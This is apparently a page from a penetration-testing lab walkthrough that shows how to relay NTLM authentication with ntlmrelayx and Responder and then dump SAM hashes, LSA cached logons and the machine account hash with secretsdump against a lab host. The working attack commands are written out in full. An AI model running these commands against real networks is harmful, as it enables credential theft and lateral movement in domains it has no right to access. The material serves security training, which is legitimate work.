Secretsdump

Use secretsdump to get SAM database, LSA cached logon, machine account and some DPAPI informations

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Dump the sam database

proxychains secretsdump -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22'

  • The sam database contains the local accounts. We will ignore vagrant as it is the default user to setup the lab.

  • The important information here is the NT hash of the local administrator user.

  • We also got the LSA cache of the last connected users (by default windows keep the last 10 users), this is useful to connect to the server even if the domain controller is unreachable. But those cached credentials can be cracked offline with hashcat (very slow).

  • And to finish we also got the hash of the computer account. (Sometimes you will get no useful domain accounts or no information at all on a domain joined computer but if you get this hash you got an account on the domain!)

PreviousNTLM relayNextLsassy

Last updated